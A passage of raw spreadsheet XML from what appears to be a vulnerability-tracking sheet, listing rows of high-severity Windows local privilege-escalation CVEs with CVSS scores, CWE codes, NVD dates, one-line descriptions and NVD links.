t="inlineStr"><is><t>NVD</t></is></c><c r="O541" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P541" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q541" s="5" t="inlineStr" /><c r="R541" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S541" s="5" t="inlineStr"><is><t>Use after free in Graphic Fonts allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T541" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69576</t></is></c></row><row r="542"><c r="A542" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B542" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C542" s="5" t="inlineStr"><is><t>CVE-2026-69580</t></is></c><c r="D542" s="5" t="n"><v>7.8</v></c><c r="E542" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F542" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G542" s="5" t="inlineStr" /><c r="H542" s="5" t="n"><v>0.003</v></c><c r="I542" s="5" t="inlineStr" /><c r="J542" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K54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2" s="5" t="inlineStr" /><c r="M542" s="5" t="inlineStr" /><c r="N542" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O542" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P542" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q542" s="5" t="inlineStr" /><c r="R542" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S542" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T542" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69580</t></is></c></row><row r="543"><c r="A543" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B543" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C543" s="5" t="inlineStr"><is><t>CVE-2026-69582</t></is></c><c r="D543" s="5" t="n"><v>7.8</v></c><c r="E543" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F543" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G543" s="5" t="inlineStr" /><c r="H543" s="5" t="n"><v>0.003</v></c><c r="I543" s="5" t="inlineStr" /><c r="J543" s="5" t="inlineStr" /><c r="K543" s="5" t="inlineStr" /><c r="L543" s="5" t="inlineStr" /><c r="M543" s="5" t="inlineStr" /><c r="N543" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O543" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P543" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q543" s="5" t="inlineStr" /><c r="R543" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S543" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T543" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69582</t></is></c></row><row r="544"><c r="A544" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B544" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C544" s="5" t="inlineStr"><is><t>CVE-2026-69583</t></is></c><c r="D544" s="5" t="n"><v>7.8</v></c><c r="E544" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F544" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G544" s="5" t="inlineStr" /><c r="H544" s="5" t="n"><v>0.003</v></c><c r="I544" s="5" t="inlineStr" /><c r="J544" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K54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4" s="5" t="inlineStr" /><c r="M544" s="5" t="inlineStr" /><c r="N544" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O544" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P544" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q544" s="5" t="inlineStr" /><c r="R544" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S544" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T544" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69583</t></is></c></row><row r="545"><c r="A545" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B545" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C545" s="5" t="inlineStr"><is><t>CVE-2026-69584</t></is></c><c r="D545" s="5" t="n"><v>7.8</v></c><c r="E545" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F545" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G545" s="5" t="inlineStr" /><c r="H545" s="5" t="n"><v>0.003</v></c><c r="I545" s="5" t="inlineStr" /><c r="J545" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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45" s="5" t="inlineStr" /><c r="M545" s="5" t="inlineStr" /><c r="N545" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O545" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P545" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q545" s="5" t="inlineStr" /><c r="R545" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S545" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T545" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69584</t></is></c></row><row r="546"><c r="A546" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B546" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C546" s="5" t="inlineStr"><is><t>CVE-2026-69585</t></is></c><c r="D546" s="5" t="n"><v>7.8</v></c><c r="E546" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F546" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G546" s="5" t="inlineStr" /><c r="H546" s="5" t="n"><v>0.004</v></c><c r="I546" s="5" t="inlineStr" /><c r="J546" s="5" t="inlineStr" /><c r="K546" s="5" t="inlineStr" /><c r="L546" s="5" t="inlineStr" /><c r="M546" s="5" t="inlineStr" /><c r="N546" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O546" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P546" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q546" s="5" t="inlineStr" /><c r="R546" s="5" t="inlineStr"><is><t>CWE-704</t></is></c><c r="S546" s="5" t="inlineStr"><is><t>Incorrect type conversion or cast in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T546" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69585</t></is></c></row><row r="547"><c r="A547" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B547" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C547" s="5" t="inlineStr"><is><t>CVE-2026-69589</t></is></c><c r="D547" s="5" t="n"><v>7.8</v></c><c r="E547" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F547" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G547" s="5" t="inlineStr" /><c r="H547" s="5" t="n"><v>0.003</v></c><c r="I547" s="5" t="inlineStr" /><c r="J547" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K54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7" s="5" t="inlineStr" /><c r="M547" s="5" t="inlineStr" /><c r="N547" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O547" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P547" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q547" s="5" t="inlineStr" /><c r="R547" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S547" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T547" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69589</t></is></c></row><row r="548"><c r="A548" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B548" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C548" s="5" t="inlineStr"><is><t>CVE-2026-69592</t></is></c><c r="D548" s="5" t="n"><v>7.8</v></c><c r="E548" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F548" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G548" s="5" t="inlineStr" /><c r="H548" s="5" t="n"><v>0.003</v></c><c r="I548" s="5" t="inlineStr" /><c r="J548" s="5" t="inlineStr" /><c r="K548" s="5" t="inlineStr" /><c r="L548" s="5" t="inlineStr" /><c r="M548" s="5" t="inlineStr" /><c r="N548" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O548" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P548" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q548" s="5" t="inlineStr" /><c r="R548" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S548" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T548" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69592</t></is></c></row><row r="549"><c r="A549" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B549" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C549" s="5" t="inlineStr"><is><t>CVE-2026-69593</t></is></c><c r="D549" s="5" t="n"><v>7.8</v></c><c r="E549" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F549" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G549" s="5" t="inlineStr" /><c r="H549" s="5" t="n"><v>0.003</v></c><c r="I549" s="5" t="inlineStr" /><c r="J549" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K54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9" s="5" t="inlineStr" /><c r="M549" s="5" t="inlineStr" /><c r="N549" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O549" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P549" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q549" s="5" t="inlineStr" /><c r="R549" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S549" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T549" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69593</t></is></c></row><row r="550"><c r="A550" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B550" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C550" s="5" t="inlineStr"><is><t>CVE-2026-69594</t></is></c><c r="D550" s="5" t="n"><v>7.8</v></c><c r="E550" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F550" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G550" s="5" t="inlineStr" /><c r="H550" s="5" t="n"><v>0.003</v></c><c r="I550" s="5" t="inlineStr" /><c r="J550" s="5" t="inlineStr" /><c r="K550" s="5" t="inlineStr" /><c r="L550" s="5" t="inlineStr" /><c r="M550" s="5" t="inlineStr" /><c r="N550" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O550" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P550" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q550" s="5" t="inlineStr" /><c r="R550" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S550" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T550" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69594</t></is></c></row><row r="551"><c r="A551" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B551" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C551" s="5" t="inlineStr"><is><t>CVE-2026-69604</t></is></c><c r="D551" s="5" t="n"><v>7.8</v></c><c r="E551" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F551" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G551" s="5" t="inlineStr" /><c r="H551" s="5" t="n"><v>0.003</v></c><c r="I551" s="5" t="inlineStr" /><c r="J551" s="5" t="inlineStr" /><c r="K551" s="5" t="inlineStr" /><c r="L551" s="5" t="inlineStr" /><c r="M551" s="5" t="inlineStr" /><c r="N551" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O551" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P551" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q551" s="5" t="inlineStr" /><c r="R551" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S551" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T551" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69604</t></is></c></row><row r="552"><c r="A552" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B552" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C552" s="5" t="inlineStr"><is><t>CVE-2026-69608</t></is></c><c r="D552" s="5" t="n"><v>7.8</v></c><c r="E552" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F552" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G552" s="5" t="inlineStr" /><c r="H552" s="5" t="n"><v>0.003</v></c><c r="I552" s="5" t="inlineStr" /><c r="J552" s="5" t="inlineStr" /><c r="K552" s="5" t="inlineStr" /><c r="L552" s="5" t="inlineStr" /><c r="M552" s="5" t="inlineStr" /><c r="N552" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O552" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P552" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q552" s="5" t="inlineStr" /><c r="R552" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S552" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T552" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69608</t></is></c></row><row r="553"><c r="A553" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B553" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C553" s="5" t="inlineStr"><is><t>CVE-2026-69612</t></is></c><c r="D553" s="5" t="n"><v>7.8</v></c><c r="E553" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F553" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G553" s="5" t="inlineStr" /><c r="H553" s="5" t="n"><v>0.004</v></c><c r="I553" s="5" t="inlineStr" /><c r="J553" s="5" t="inlineStr" /><c r="K553" s="5" t="inlineStr" /><c r="L553" s="5" t="inlineStr" /><c r="M553" s="5" t="inlineStr" /><c r="N553" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O553" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P553" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q553" s="5" t="inlineStr" /><c r="R553" s="5" t="inlineStr"><is><t>CWE-36</t></is></c><c r="S553" s="5" t="inlineStr"><is><t>Absolute path traversal in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T553" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69612</t></is></c></row><row r="554"><c r="A554" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B554" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C554" s="5" t="inlineStr"><is><t>CVE-2026-69685</t></is></c><c r="D554" s="5" t="n"><v>7.8</v></c><c r="E554" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F554" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G554" s="5" t="inlineStr" /><c r="H554" s="5" t="n"><v>0.003</v></c><c r="I554" s="5" t="inlineStr" /><c r="J554" s="5" t="inlineStr" /><c r="K554" s="5" t="inlineStr" /><c r="L554" s="5" t="inlineStr" /><c r="M554" s="5" t="inlineStr" /><c r="N554" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O554" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P554" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q554" s="5" t="inlineStr" /><c r="R554" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S554" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T554" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69685</t></is></c></row><row r="555"><c r="A555" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B555" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C555" s="5" t="inlineStr"><is><t>CVE-2026-69687</t></is></c><c r="D555" s="5" t="n"><v>7.8</v></c><c r="E555" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F555" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G555" s="5" t="inlineStr" /><c r="H555" s="5" t="n"><v>0.003</v></c><c r="I555" s="5" t="inlineStr" /><c r="J555" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K55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5" s="5" t="inlineStr" /><c r="M555" s="5" t="inlineStr" /><c r="N555" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O555" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P555" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q555" s="5" t="inlineStr" /><c r="R555" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S555" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T555" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69687</t></is></c></row><row r="556"><c r="A556" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B556" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C556" s="5" t="inlineStr"><is><t>CVE-2026-69691</t></is></c><c r="D556" s="5" t="n"><v>7.8</v></c><c r="E556" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F556" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G556" s="5" t="inlineStr" /><c r="H556" s="5" t="n"><v>0.003</v></c><c r="I556" s="5" t="inlineStr" /><c r="J556" s="5" t="inlineStr" /><c r="K556" s="5" t="inlineStr" /><c r="L556" s="5" t="inlineStr" /><c r="M556" s="5" t="inlineStr" /><c r="N556" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O556" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P556" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q556" s="5" t="inlineStr" /><c r="R556" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S556" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T556" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69691</t></is></c></row><row r="557"><c r="A557" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B557" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C557" s="5" t="inlineStr"><is><t>CVE-2026-69707</t></is></c><c r="D557" s="5" t="n"><v>7.8</v></c><c r="E557" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F557" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G557" s="5" t="inlineStr" /><c r="H557" s="5" t="n"><v>0.003</v></c><c r="I557" s="5" t="inlineStr" /><c r="J557" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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7" s="5" t="inlineStr" /><c r="M557" s="5" t="inlineStr" /><c r="N557" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O557" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P557" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q557" s="5" t="inlineStr" /><c r="R557" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S557" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T557" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69707</t></is></c></row><row r="558"><c r="A558" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B558" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C558" s="5" t="inlineStr"><is><t>CVE-2026-69709</t></is></c><c r="D558" s="5" t="n"><v>7.8</v></c><c r="E558" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F558" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G558" s="5" t="inlineStr" /><c r="H558" s="5" t="n"><v>0.003</v></c><c r="I558" s="5" t="inlineStr" /><c r="J558" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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8" s="5" t="inlineStr" /><c r="M558" s="5" t="inlineStr" /><c r="N558" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O558" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P558" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q558" s="5" t="inlineStr" /><c r="R558" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S558" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T558" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69709</t></is></c></row><row r="559"><c r="A559" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B559" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C559" s="5" t="inlineStr"><is><t>CVE-2026-69720</t></is></c><c r="D559" s="5" t="n"><v>7.8</v></c><c r="E559" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F559" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G559" s="5" t="inlineStr" /><c r="H559" s="5" t="n"><v>0.003</v></c><c r="I559" s="5" t="inlineStr" /><c r="J559" s="5" t="inlineStr" /><c r="K559" s="5" t="inlineStr" /><c r="L559" s="5" t="inlineStr" /><c r="M559" s="5" t="inlineStr" /><c r="N559" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O559" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P559" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q559" s="5" t="inlineStr" /><c r="R559" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S559" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows MIDI Service Module allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T559" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69720</t></is></c></row><row r="560"><c r="A560" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B560" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C560" s="5" t="inlineStr"><is><t>CVE-2026-69725</t></is></c><c r="D560" s="5" t="n"><v>7.8</v></c><c r="E560" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F560" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G560" s="5" t="inlineStr" /><c r="H560" s="5" t="n"><v>0.003</v></c><c r="I560" s="5" t="inlineStr" /><c r="J560" s="5" t="inlineStr" /><c r="K560" s="5" t="inlineStr" /><c r="L560" s="5" t="inlineStr" /><c r="M560" s="5" t="inlineStr" /><c r="N560" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O560" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P560" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q560" s="5" t="inlineStr" /><c r="R560" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S560" s="5" t="inlineStr"><is><t>Double free in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T560" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69725</t></is></c></row><row r="561"><c r="A561" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B561" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C561" s="5" t="inlineStr"><is><t>CVE-2026-69731</t></is></c><c r="D561" s="5" t="n"><v>7.8</v></c><c r="E561" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F561" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G561" s="5" t="inlineStr" /><c r="H561" s="5" t="n"><v>0.003</v></c><c r="I561" s="5" t="inlineStr" /><c r="J561" s="5" t="inlineStr" /><c r="K561" s="5" t="inlineStr" /><c r="L561" s="5" t="inlineStr" /><c r="M561" s="5" t="inlineStr" /><c r="N561" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O561" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P561" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q561" s="5" t="inlineStr" /><c r="R561" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S561" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in HID class driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T561" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69731</t></is></c></row><row r="562"><c r="A562" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B562" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C562" s="5" t="inlineStr"><is><t>CVE-2026-69738</t></is></c><c r="D562" s="5" t="n"><v>7.8</v></c><c r="E562" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F562" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G562" s="5" t="inlineStr" /><c r="H562" s="5" t="n"><v>0.003</v></c><c r="I562" s="5" t="inlineStr" /><c r="J562" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K56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62" s="5" t="inlineStr" /><c r="M562" s="5" t="inlineStr" /><c r="N562" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O562" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P562" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q562" s="5" t="inlineStr" /><c r="R562" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S562" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T562" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69738</t></is></c></row><row r="563"><c r="A563" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B563" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C563" s="5" t="inlineStr"><is><t>CVE-2026-69758</t></is></c><c r="D563" s="5" t="n"><v>7.8</v></c><c r="E563" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F563" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G563" s="5" t="inlineStr" /><c r="H563" s="5" t="n"><v>0.003</v></c><c r="I563" s="5" t="inlineStr" /><c r="J563" s="5" t="inlineStr" /><c r="K563" s="5" t="inlineStr" /><c r="L563" s="5" t="inlineStr" /><c r="M563" s="5" t="inlineStr" /><c r="N563" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O563" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P563" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q563" s="5" t="inlineStr" /><c r="R563" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S563" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T563" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69758</t></is></c></row><row r="564"><c r="A564" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B564" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C564" s="5" t="inlineStr"><is><t>CVE-2026-69785</t></is></c><c r="D564" s="5" t="n"><v>7.8</v></c><c r="E564" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F564" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G564" s="5" t="inlineStr" /><c r="H564" s="5" t="n"><v>0.003</v></c><c r="I564" s="5" t="inlineStr" /><c r="J564" s="5" t="inlineStr" /><c r="K564" s="5" t="inlineStr" /><c r="L564" s="5" t="inlineStr" /><c r="M564" s="5" t="inlineStr" /><c r="N564" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O564" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P564" s="5" 